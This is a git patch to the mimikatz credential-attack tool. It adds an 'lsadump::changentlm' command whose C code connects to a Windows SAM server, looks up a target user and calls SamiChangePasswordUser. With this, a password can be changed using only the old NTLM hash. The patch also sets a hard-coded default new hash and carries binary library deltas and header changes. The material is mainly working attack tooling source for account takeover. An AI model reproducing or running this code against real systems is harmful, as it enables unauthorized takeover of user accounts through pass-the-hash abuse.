From 9cd6a49e4cb2aaa82ce06404b12cab307de6ca02 Mon Sep 17 00:00:00 2001
From: Benjamin DELPY <benjamin@gentilkiwi.com>
Date: Thu, 8 Jun 2017 00:48:55 +0200
Subject: [PATCH] [new] lsadump::changentlm to *change* user password/hash to
 another password/hash

---
 lib/Win32/ntdll.min.lib           | Bin 11016 -> 11542 bytes
 lib/x64/ntdll.min.lib             | Bin 10346 -> 10838 bytes
 mimikatz/modules/kuhl_m_lsadump.c | 131 ++++++++++++++++++++++++++++++
 mimikatz/modules/kuhl_m_lsadump.h |   1 +
 modules/kull_m_samlib.h           |   2 +
 modules/kull_m_string.h           |   6 +-
 6 files changed, 138 insertions(+), 2 deletions(-)

diff --git a/lib/Win32/ntdll.min.lib b/lib/Win32/ntdll.min.lib
index 9c82d09f740c97ef9f8bb99bbe4b26e7f1eee770..79c592d5e2dfca03bcd4f3834dd10e44a74379b1 100644
GIT binary patch
delta 2243
zcmbuBO-x)>6vzJq48zA`n0CJB&71e;`vcmvScf5{6>Iz`A(dK#S_!g{C<$dMvSLHk
z#+bB;wMSVPOS)*9Mh$3Y+nCxkc4G*wYeSnDv^(6mFe!NMyU#aoiaSYuxn$0{=lt(E
z=iZr5#+FWBQa$BL`RPNI0rF{~#lHS>#W4RSI{=&lLM0$F0z}UNu{DW$3lPLB5^Wg}
z=nIlW2oUI75@P}|;r#}a9J08{E0ek*NiSXm(oCksVvbkArX+g@Fd5^O$!9Ds^UCDP
zl0q9`GS4ehye}yY117h5WqSH7R(NG5dJVv2iB~3fU6SIH3equ2fdvVQ;}VVc2@>0q
z_%*H!lQ=I?2f1Q{^e{ABTXU^6dtR8EntFNa44rg`n|ZBO-PI<V@pRF;r`7#xRhU*i
zdHG*$-E+6;i7xfqUFrcJB?OE_fOAn`jTPQffl3@$)_?__dzb*Wc%5K{Ys^p*xXIi|
z0T<Ii3zu<@*<|iyfiWhN2QD+^9MDz(=9&9NV7P=u+~%R^<IF3J(F-gw*V(bc0b?9+
zlby%e*<b<NoctP#InV1L3*(tW3wq#2D~ia&gLafqKpQ&H2?bs7B8_fj;KLs5g&#o#
z5J3tdgb_syQ(5GoA`T4+=rE9k3r+ts=&qPGkMe$#*_>(b1s6?weD&tk9(5mS7B+5R
zf!=ht*M|Hx7d_tFK|chXO?(tM<mg<O4hOqi?wzi@K_`M=w~8C4UZL&aYt8DFujuvA
z?+)J(jfZ{G_iXsXx^JHJNSo<jiX3n7zZCJgMeJYby|7NRL6tTl)%r%2s!_RdA^M`d
z@w;qECiyEmV1LLj0gc20og&&(EYbyqG^Ipe#1aiY>#=~`{739LhapVIRlhV$s{IZ_
zh`b4F$IohAgGhHE9%vWo_H#Nn-BXivw!M``6PmsKK{`yUaVzdmac4s72uHQXBYdt|
z$-dQ|x5J2JtinvjQ;T-`Ueo_G*-qYXR)8-9kETNVy5bELuuB)w>v@IBs&1+LSU+s%
z6^0F6M&zr<W3EuOIYL3Bv8JPjCHh^Xu|js~esdTa(oH7o=|(eFQPz`3Yz_8@$5QnV
zt-30r`h4H{zA2zjTQquH>ZGeNzrEY1Ss{DVjpzL+ZJqba^fR{igS6%C&D2$K$uyCN
zp8~$i3f_8Ue#UwVPtDIw&%Q$kb;Az9a?J+tqr&%Jp=aGuTFy8pLfZLd<99)!hwcz{
zWgE-+QdW-fKK6;R&$2f|7aTsU$jl)Wsciqz8>GLp&KzOlK`_Tf3__ev<_2wrJ}pe&
z<fN6KHfVG=*JoRu`V$=6)g7f1`CYNi%8S^#sQi{+rGY~I5TZRSz;-f()1JU?C%zk|
zO3}k4eO5SX>##a(o>N#;tYx(|!CE@#S1sW1E13~QJ=63-v20t!rQyLet>OzOLw^>J
z*;YQMX%T(O(wS1lwpij#t2kkfHcG`OhAO1}`;)^k#E*`h9sV+Ni77e2JMz3E7B#;S
S<%A3!?8EH*+cPu!8T<nZ)BE`V

delta 1974
zcmb`HOK4nW6vzLQ_hV|3PBQn-+~>UKPGXEnoVKV5Xhp1|Sg3{w5^5<3u~ytjkfur(
zS=l-Vvd}K77OXCcFm%yUP(kWKTPv;vNjD{Kq}WXtby5G{ea%d8>A;UObI<F4&i&@w
zT;6!)jL|<+ug~pybVg?E^!jXlcHZ?rD?<QY0w!p+DL`KVG8Y4~=KzJF2bd=Sg}oeL
z-s5j#-wbdT03YT%#C1c?(vsXpKz@A{$SZCK6b=GD*Jw$x9#Gl@6y=_P;srh@<+YG)
zT2kE~a+Q{N^C9PHNsU5$8nooa5+_pRBJT4$sVs%upd}^(tSvxcoC>gx@HfdaAZtoO
zKhWGtT<mUM={?-lJT`E-Ysa?d;%$4ZI5YuFX}}7*U(5jKvfR4?oM5$O8@NY%lXk(O
zpQt^aB^x<lH4oe-2MfS8QZE9VC7`DaT;TUL+HJDG3S1@g9@cT5UELbcAUcC}7P?QC
zD!>h*=G?M?QxtK8)}$bw3G~22FZxhH3H=yE6=e)y2*XHX7al?mBgkVEW7v%p#-YK*
z1k%uvK><Z%VX*We3pN}i(DgqR^y@XhOupOIoE}+ANS8kQ`B--|JAOSOsdTMv_nN$x
z9_g_!|Gp&0(qH!tbEczr#MWNzK6>XTc~ASZEjBIh>!U&J8U4dnY(*9`1AhF0%yS*_
z-(*I6Rqfy8W8IOD(uO?9yxmGP<a9Pj{3QEqoOrxc3!0>jeepy7CuP+bPpWEj6q(?H
z#U1nHl3~X|-<37FYovng0rTnDF=K1;rWra;ntNi0%6P;H9e<fE5z6thl^Rt2rrEDo
z?wYyAP@f!ktSGxt(&QH_Oy0KI+l3RnZnq{-6))Lg^w0J)Q56X__^o)qU{HRwot>?`
z+OU$sqsh~il<T|9j>+Sl?RDdhO5SNV<*&?TUQ(^>v)yU=!R;8~ft&Jc^SJZOCS|=_
zm&bCQTYY0P6uyz`+!2@OH&DVyRD(n+FVp#s1{4vzl9Tzzqp6j+TT#)!^H2Wg^TUOX
z=iIg5OZ^{Hs@Df8Oa3Sh$+yOMl+VjM-2Ds1j!k?~3`JZiE=IwP=%h`Tb_(;~25%8)
zGFIN(mf)|7R}TNeNpbqp@@ct!RW)DX!}MpA!so{elBu);_@4aAyt|N<cPjI7WiN23
z7i`F_$`g@;18K6a8k|JlJ}~7_bvE*bYmC)e@_n_X)(h0AnzmB2IB3X^UaY3k*3*%%
zytrq0u>GoP*{(RXh4z;1Zz88EkM&!!SZh@d$5eaD%gAIsO7;&s50hVdlHP)>Pd*iS
VcTQ83e<s_f@w3!4C3$Pg`xkS&v_b#?

diff --git a/lib/x64/ntdll.min.lib b/lib/x64/ntdll.min.lib
index 9086efc47a4ad0742dfaf2b32eb63650931bf3e7..8ebb06ef46d2e8b819bee6888f168282ce47aba7 100644
GIT binary patch
literal 10838
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
W4flXpww%bbIFYkf#Av};f&T&inFa9x

delta 2035
zcmb`HTWB0*6vzL&*<^FubluC$&d%)a>^+HSw@tH&8ZW^V+7vVt1z%cMv86=B_N@<M
zD3(}IOZ2=|DL#Z!q+n&CUT9wntyPK-61AvL3W_0*5lZp@eKVvp(MJQnoZUV5^L^j>
z{<%LER_u7I-JY15-X+IvV`=xq<Q`Z5bp`=E3#8V8Y!Wc$0P~zj?lhp;q$K%+9!?QZ
z<ga@;EBvmw>rq$)G;5TkxZqK00}6L3#ea%rpAAY<?)coIB-M(~SxQow@u;z8%`r++
zzv|Iw0h(1x(oFiCp;WL5#WR(Q3`B}IJxVlI)L5;eKJQ`iv%<dMVX;7k%|wb^Od&V2
z^WC2#yL!4)z4>VO!}#&&wrRJwrai{e*V%e93(Oh7ITJXY12)OQJgael>y#^$cgbP_
zSR)IZce})Ma)D*CK{{pN7O7N$vt)+jQgb;*uGWE816XZf3CSjKhHR3HG`h)Ps|>bA
z!+9F6S-=IG0V!LQF&4u+ff&Zni#{|_M;rqfMFag9#1Mv&zzE9NfeMm%04b!Afe9B`
z7|6jwm6haS!@=_f6j4G1(f=u+j@Nx>$cc8pNbHYvt2^#Q<z8$=I(-A(hf>QC`6)df
zJOOLZ^rUy)-Ok`E%RM;q<qt2!BS62rZ?@$`=JmcIwtIA4el?ns$hLZpu7530Wq%I_
zkvSvTs~kU<_so)<G+w^%w9|L6<Uz9)ayn@yW6DY1H9xs;UzHbg{aZe7<sJ_Ce4ER7
zKELHALyBq3S1ecu0t!<OHPfEQZR^Q^!jO;azQ<gCBBc1y@fDZyPlpu4c4j~oJkEji
z%4d03_S<g2V%$q~-VP_)syXEZYc}PG<Cpe^GaCqF2rJNuMww_pPC3PGiA>p9_gxnY
zj|W{psQR_vDNF@_msZhN>?=O<--;_Cg(-<rdPsH4hr#<ClM_8fSt=Jp&iiV9)Q?Jg
zLyCJPUtzexI!t-hO%JQ6d}e$bF-S6&k@IdL;H{0kQEs@wV*U9ZE{Es)RoTz=T{%48
zdc_~oOy#jad_%UXyHp8R_gdBKnG1j~HYS%7#=m-|vpyVdAmrrl>h4fzPDJ;omYJpc
zyB06W+qKZxct|<|*9r3SODz~dAFbAMd%>0i_32Q2-de5Y8iFI&>cQt>3hUR|Rs98(
z{nJ!-TLY&2+3=cFE3wEXXGbi#+z6ilZFCxCQ<8WyScHC4`f6}Ta;@=djM&UFD7P!=
zK(X3RM^ScV`K$S8K&wwdYt<kt^3rH{47`3?tFB*Fz8QTY;2UnVrW!q!&dQ;&;F$F!
S^;Rm&?3gKs<9+gGdH5d$o!gfH

diff --git a/mimikatz/modules/kuhl_m_lsadump.c b/mimikatz/modules/kuhl_m_lsadump.c
index 3a5badc..8beba6f 100644
--- a/mimikatz/modules/kuhl_m_lsadump.c
+++ b/mimikatz/modules/kuhl_m_lsadump.c
@@ -15,6 +15,7 @@ const KUHL_M_C kuhl_m_c_lsadump[] = {
 	{kuhl_m_lsadump_rpdata,		L"rpdata",		NULL},
 	{kuhl_m_lsadump_dcsync,		L"dcsync",		L"Ask a DC to synchronize an object"},
 	{kuhl_m_lsadump_setntlm,	L"setntlm",		L"Ask a server to set a new password/ntlm for one user"},
+	{kuhl_m_lsadump_changentlm,	L"changentlm",	L"Ask a server to set a new password/ntlm for one user"},
 	{kuhl_m_lsadump_netsync,	L"netsync",		L"Ask a DC to send current and previous NTLM hash of DC/SRV/WKS"},
 };
 
@@ -2367,4 +2368,134 @@ NTSTATUS kuhl_m_lsadump_setntlm(int argc, wchar_t * argv[])
 	}
 	else PRINT_ERROR(L"Argument /user: is needed\n");
 	return STATUS_SUCCESS;
+}
+
+/*	This function `changentlm` is based on another crazy idea of
+	Vincent LE TOUX ( vincent.letoux@gmail.com / http://www.mysmartlogon.com )
+*/
+NTSTATUS kuhl_m_lsadump_changentlm(int argc, wchar_t * argv[])
+{
+	NTSTATUS status0 = STATUS_DATA_ERROR, status1 = STATUS_DATA_ERROR;
+	LSA_UNICODE_STRING serverName, userName, password;
+	SAMPR_HANDLE hServerHandle, hDomainHandle, hUserHandle;
+	DWORD i, domainEnumerationContext = 0, domainCountRetourned, *pRid = NULL, *pUse = NULL;
+	PSAMPR_RID_ENUMERATION pEnumDomainBuffer;
+	PSID domainSid;
+	PCWCHAR szUser, szServer = NULL, szPassword;
+	BYTE oldNtlm[LM_NTLM_HASH_LENGTH], newNtlm[LM_NTLM_HASH_LENGTH] = {0x60, 0xba, 0x4f, 0xca, 0xdc, 0x46, 0x6c, 0x7a, 0x03, 0x3c, 0x17, 0x81, 0x94, 0xc0, 0x3d, 0xf6}, emptyLM[LM_NTLM_HASH_LENGTH] = {0};
+
+	if(kull_m_string_args_byName(argc, argv, L"user", &szUser, NULL))
+	{
+		RtlInitUnicodeString(&userName, szUser);
+		kull_m_string_args_byName(argc, argv, L"server", &szServer, NULL);
+		RtlInitUnicodeString(&serverName, szServer ? szServer : L"");
+		kprintf(L"Target server: %wZ\n", &serverName);
+		kprintf(L"Target user  : %wZ\n", &userName);
+		
+		
+		if(kull_m_string_args_byName(argc, argv, L"oldpassword", &szPassword, NULL))
+		{
+			RtlInitUnicodeString(&password, szPassword);
+			status0 = RtlDigestNTLM(&password, oldNtlm);
+			if(!NT_SUCCESS(status0))
+				PRINT_ERROR(L"Unable to digest NTLM hash from old password: %08x\n", status0);
+		}
+		else if(kull_m_string_args_byName(argc, argv, L"oldntlm", &szPassword, NULL) || kull_m_string_args_byName(argc, argv, L"old", &szPassword, NULL))
+		{
+			status0 = kull_m_string_stringToHex(szPassword, oldNtlm, sizeof(oldNtlm)) ? STATUS_SUCCESS : STATUS_WRONG_PASSWORD;
+			if(!NT_SUCCESS(status0))
+				PRINT_ERROR(L"Unable to convert \'%s\' to old NTLM hash (16 bytes)\n", szPassword);
+		}
+		else PRINT_ERROR(L"Argument /oldpassword: or /oldntlm: is needed\n");
+
+
+		if(kull_m_string_args_byName(argc, argv, L"newpassword", &szPassword, NULL))
+		{
+			RtlInitUnicodeString(&password, szPassword);
+			status1 = RtlDigestNTLM(&password, newNtlm);
+			if(!NT_SUCCESS(status1))
+				PRINT_ERROR(L"Unable to digest NTLM hash from new password: %08x\n", status0);
+		}
+		else if(kull_m_string_args_byName(argc, argv, L"newntlm", &szPassword, NULL) || kull_m_string_args_byName(argc, argv, L"new", &szPassword, NULL))
+		{
+			status1 = kull_m_string_stringToHex(szPassword, newNtlm, sizeof(newNtlm)) ? STATUS_SUCCESS : STATUS_WRONG_PASSWORD;
+			if(!NT_SUCCESS(status1))
+				PRINT_ERROR(L"Unable to convert \'%s\' to new NTLM hash (16 bytes)\n", szPassword);
+		}
+		else
+		{
+			kprintf(L"** No new credentials provided, will use the default one **\n");
+			status1 = STATUS_SUCCESS;
+		}
+
+		if(NT_SUCCESS(status0) && NT_SUCCESS(status1))
+		{
+			kprintf(L"OLD NTLM     : ");
+			kull_m_string_wprintf_hex(oldNtlm, sizeof(oldNtlm), 0);
+			kprintf(L"\nNEW NTLM     : ");
+			kull_m_string_wprintf_hex(newNtlm, sizeof(newNtlm), 0);
+			kprintf(L"\n\n");
+			status0 = SamConnect(&serverName, &hServerHandle, SAM_SERVER_CONNECT | SAM_SERVER_ENUMERATE_DOMAINS | SAM_SERVER_LOOKUP_DOMAIN, FALSE);
+			if(NT_SUCCESS(status0))
+			{
+				do
+				{
+					status1 = SamEnumerateDomainsInSamServer(hServerHandle, &domainEnumerationContext, &pEnumDomainBuffer, 1, &domainCountRetourned);
+					if(NT_SUCCESS(status1) || status1 == STATUS_MORE_ENTRIES)
+					{
+						for(i = 0; i < domainCountRetourned; i++)
+						{
+							if(RtlEqualUnicodeString(&pEnumDomainBuffer[i].Name, &uBuiltin, TRUE))
+								continue;
+							kprintf(L"Domain name  : %wZ\n", &pEnumDomainBuffer[i].Name);
+							status0 = SamLookupDomainInSamServer(hServerHandle, &pEnumDomainBuffer[i].Name, &domainSid);
+							if(NT_SUCCESS(status0))
+							{
+								kprintf(L"Domain SID   : ");
+								kull_m_string_displaySID(domainSid);
+								kprintf(L"\n");
+								status0 = SamOpenDomain(hServerHandle, DOMAIN_LOOKUP, domainSid, &hDomainHandle);
+								if(NT_SUCCESS(status0))
+								{
+									status0 = SamLookupNamesInDomain(hDomainHandle, 1, &userName, &pRid, &pUse);
+									if(NT_SUCCESS(status0))
+									{
+										kprintf(L"User RID     : %u\n", pRid[0]);
+										status0 = SamOpenUser(hDomainHandle, USER_CHANGE_PASSWORD, pRid[0], &hUserHandle);
+										if(NT_SUCCESS(status0))
+										{
+											status0 = SamiChangePasswordUser(hUserHandle, FALSE, emptyLM, emptyLM, TRUE, oldNtlm, newNtlm);
+											if(NT_SUCCESS(status0))
+												kprintf(L"\n>> Change password is a success!\n");
+											else if(status0 == STATUS_WRONG_PASSWORD)
+												PRINT_ERROR(L"Bad old NTLM hash or password!\n");
+											else if(status0 == STATUS_PASSWORD_RESTRICTION)
+												PRINT_ERROR(L"Bad new NTLM hash or password! (restriction)\n");
+											else PRINT_ERROR(L"SamiChangePasswordUser: %08x\n", status0);
+											SamCloseHandle(hUserHandle);
+										}
+										else PRINT_ERROR(L"SamOpenUser: %08x\n", status0);
+										SamFreeMemory(pRid);
+										SamFreeMemory(pUse);
+									}
+									else PRINT_ERROR(L"SamLookupNamesInDomain: %08x\n", status0);
+									SamCloseHandle(hDomainHandle);
+								}
+								else PRINT_ERROR(L"SamOpenDomain: %08x\n", status0);
+								SamFreeMemory(domainSid);
+							}
+							else PRINT_ERROR(L"SamLookupDomainInSamServer: %08x\n", status0);
+						}
+						SamFreeMemory(pEnumDomainBuffer);
+					}
+					else PRINT_ERROR(L"SamEnumerateDomainsInSamServer: %08x\n", status1);
+				}
+				while(status1 == STATUS_MORE_ENTRIES);
+				SamCloseHandle(hServerHandle);
+			}
+			else PRINT_ERROR(L"SamConnect: %08x\n", status0);
+		}
+	}
+	else PRINT_ERROR(L"Argument /user: is needed\n");
+	return STATUS_SUCCESS;
 }
\ No newline at end of file
diff --git a/mimikatz/modules/kuhl_m_lsadump.h b/mimikatz/modules/kuhl_m_lsadump.h
index 54d0c29..8d586ac 100644
--- a/mimikatz/modules/kuhl_m_lsadump.h
+++ b/mimikatz/modules/kuhl_m_lsadump.h
@@ -86,6 +86,7 @@ NTSTATUS kuhl_m_lsadump_bkey(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_rpdata(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_dcsync(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_setntlm(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_lsadump_changentlm(int argc, wchar_t * argv[]);
 NTSTATUS kuhl_m_lsadump_netsync(int argc, wchar_t * argv[]);
 
 BOOL kuhl_m_lsadump_getSids(IN PKULL_M_REGISTRY_HANDLE hSecurity, IN HKEY hPolicyBase, IN LPCWSTR littleKey, IN LPCWSTR prefix);
diff --git a/modules/kull_m_samlib.h b/modules/kull_m_samlib.h
index a1d8d9f..a1786c9 100644
--- a/modules/kull_m_samlib.h
+++ b/modules/kull_m_samlib.h
@@ -108,6 +108,8 @@ extern NTSTATUS WINAPI SamOpenGroup(IN SAMPR_HANDLE DomainHandle, IN ACCESS_MASK
 extern NTSTATUS WINAPI SamOpenAlias(IN SAMPR_HANDLE DomainHandle, IN ACCESS_MASK DesiredAccess, IN DWORD AliasId, OUT SAMPR_HANDLE * AliasHandle);
 extern NTSTATUS WINAPI SamQueryInformationUser(IN SAMPR_HANDLE UserHandle, IN USER_INFORMATION_CLASS UserInformationClass, PSAMPR_USER_INFO_BUFFER* Buffer);
 extern NTSTATUS WINAPI SamSetInformationUser(IN SAMPR_HANDLE UserHandle, IN USER_INFORMATION_CLASS UserInformationClass, PSAMPR_USER_INFO_BUFFER Buffer);
+extern NTSTATUS WINAPI SamiChangePasswordUser(IN SAMPR_HANDLE UserHandle, IN BOOL isOldLM, IN const BYTE oldLM[LM_NTLM_HASH_LENGTH], IN const BYTE newLM[LM_NTLM_HASH_LENGTH], IN BOOL isNewNTLM, IN const BYTE oldNTLM[LM_NTLM_HASH_LENGTH], IN const BYTE newNTLM[LM_NTLM_HASH_LENGTH]);
+
 extern NTSTATUS WINAPI SamGetGroupsForUser(IN SAMPR_HANDLE UserHandle, OUT PGROUP_MEMBERSHIP * Groups, OUT DWORD * CountReturned);
 extern NTSTATUS WINAPI SamGetAliasMembership(IN SAMPR_HANDLE DomainHandle, IN DWORD Count, IN PSID * Sid, OUT DWORD * CountReturned, OUT PDWORD * RelativeIds);
 
diff --git a/modules/kull_m_string.h b/modules/kull_m_string.h
index d9be21a..59b8d88 100644
--- a/modules/kull_m_string.h
+++ b/modules/kull_m_string.h
@@ -34,6 +34,7 @@ extern VOID WINAPI RtlUpperString(OUT PSTRING DestinationString, IN const STRING
 extern NTSTATUS WINAPI RtlUpcaseUnicodeString(IN OUT PUNICODE_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
 extern NTSTATUS WINAPI RtlDowncaseUnicodeString(PUNICODE_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
 extern WCHAR WINAPI RtlUpcaseUnicodeChar(IN WCHAR SourceCharacter);
+extern NTSTATUS WINAPI RtlUpcaseUnicodeStringToOemString(IN OUT POEM_STRING DestinationString, IN PCUNICODE_STRING SourceString, IN BOOLEAN AllocateDestinationString);
 
 extern BOOLEAN WINAPI RtlEqualString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
 extern BOOLEAN WINAPI RtlEqualUnicodeString(IN PCUNICODE_STRING String1, IN PCUNICODE_STRING String2, IN BOOLEAN CaseInSensitive);
@@ -41,8 +42,9 @@ extern BOOLEAN WINAPI RtlEqualUnicodeString(IN PCUNICODE_STRING String1, IN PCUN
 extern LONG WINAPI RtlCompareUnicodeString(IN PCUNICODE_STRING String1, IN PCUNICODE_STRING String2, IN BOOLEAN CaseInSensitive);
 extern LONG WINAPI RtlCompareString(IN const STRING *String1, IN const STRING *String2, IN BOOLEAN CaseInSensitive);
 
-extern VOID WINAPI RtlFreeAnsiString(IN PANSI_STRING AnsiString);
-extern VOID WINAPI RtlFreeUnicodeString(IN PUNICODE_STRING UnicodeString);
+extern VOID WINAPI RtlFreeAnsiString(IN OUT PANSI_STRING AnsiString);
+extern VOID WINAPI RtlFreeUnicodeString(IN OUT PUNICODE_STRING UnicodeString);
+extern VOID WINAPI RtlFreeOemString(IN OUT POEM_STRING OemString);
 
 extern NTSTATUS WINAPI RtlStringFromGUID(IN LPCGUID Guid, PUNICODE_STRING UnicodeString);
 extern NTSTATUS WINAPI RtlGUIDFromString(IN PCUNICODE_STRING GuidString, OUT GUID *Guid);